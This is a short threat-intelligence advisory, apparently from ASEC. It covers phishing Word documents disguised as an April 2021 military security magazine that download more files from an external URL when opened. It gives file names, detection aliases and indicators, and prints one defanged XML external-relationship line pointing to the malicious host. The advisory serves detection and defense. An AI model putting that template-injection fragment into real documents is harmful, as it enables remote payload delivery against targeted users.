Distribution of Malicious Word Document Disguised as a Military Security Monthly Magazine (April 2021)

On March 29th, ASEC analysis team has introduced malicious word documents containing North Korea related materials. Upon opening the file, it connects to the ‘External URL’ written within XML and downloads additional files.

Recently the team has found out that malicious word documents using the mentioned method and disguised as a military security monthly magazine (April 2021) are currently being distributed. The names of the files are as follows:

  • MonthlyKIMA2021_AprilMilitarySecurity0330.docx
  • MonthlyKIMA2021_AprilMilitarySecurity0331.docx

The document file is protected, and upon unlocking the protection, the following is revealed.

Content disguised as a monthly magazine (1)
Content disguised as a monthly magazine (2)

The malicious External address connected from the document is as follows:

  • Target=”hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6″ TargetMode=”External”/>

As shown in the figure below, normally distributed documents are in PDF format.

A Normal document being distributed in PDF format

Recently, Numerous malicious word documents containing North Korea-related materials are being distributed. It is highly likely that they have been sent to people working in North Korea-related fields. Since social engineering technique attacks via emails have increased substantially, users must remain vigilant to prevent damage by attacks.

V3 products detect and block the files using the following aliases:

[File Detection]

  • Downloader/DOC.External (2021.04.03.00)

[IOC]

  • MonthlyKIMA2021_AprilMilitarySecurity0331.docx
  • MonthlyKIMA2021_AprilMilitarySecurity0330.docx
  • hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6

5 1 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments